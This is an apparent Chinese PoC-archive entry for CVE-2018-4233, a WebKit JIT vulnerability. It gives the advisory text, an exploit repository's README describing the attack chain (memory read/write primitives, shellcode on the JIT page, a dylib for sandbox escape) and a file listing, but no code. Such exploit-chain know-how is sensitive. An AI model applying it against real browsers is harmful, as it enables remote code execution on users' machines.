关联漏洞
标题:多款Apple产品WebKit 安全漏洞 (CVE-2018-4233)Description:Apple iOS等都是美国苹果(Apple)公司的产品。Apple iOS是为移动设备所开发的一套操作系统;Safari是一款Web浏览器,是Mac OS X和iOS操作系统附带的默认浏览器。iCloud for Windows是一款基于Windows平台的云服务。WebKit是其中的一个Web浏览器引擎组件。 多款Apple产品中的WebKit组件存在安全漏洞。远程攻击者可借助特制的网站利用该漏洞执行任意代码(内存损坏)。以下产品和版本受到影响:Apple iOS 11.4之前版本;Safari 11
Description
Exploit for CVE-2018-4233, a WebKit JIT optimization bug used during Pwn2Own 2018
介绍
# CVE-2018-4233
Exploit for CVE-2018-4233, a bug in the JIT compiler of WebKit. Tested on Safari 11.0.3 on macOS 10.13.3.
For more details see https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf
The exploit gains arbitrary memory read/write by constructing the addrof and fakeobj primitives and subsequently faking a typed array as described in http://www.phrack.org/papers/attacking_javascript_engines.html. Afterwards it locates the JIT page and writes the stage1 shellcode there. That in turn writes a .dylib (contained in stage2.js) to disk and loads it into the renderer process to perform a sandbox escape. Stage 2 uses a separate vulnerability to break out of the Safari sandbox and will be published at a later point.
文件快照
[4.0K] /data/pocs/665198e03eb73868074451e78858bd2a78457125
├── [ 177] index.html
├── [4.9K] int64.js
├── [ 418] logging.js
├── [ 796] offsets.js
├── [ 582] pwn.html
├── [9.7K] pwn.js
├── [ 770] README.md
├── [ 372] ready.js
├── [ 227] shell.js
├── [4.0K] stage1
│ ├── [ 754] make.py
│ └── [1.9K] stage1.asm
├── [1.1K] stage1.js
├── [4.0K] stage2
│ ├── [ 181] Makefile
│ ├── [ 326] make.py
│ ├── [ 137] stage2.c
│ └── [ 83] tester.c
├── [ 17K] stage2.js
└── [2.1K] utils.js
2 directories, 18 files
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →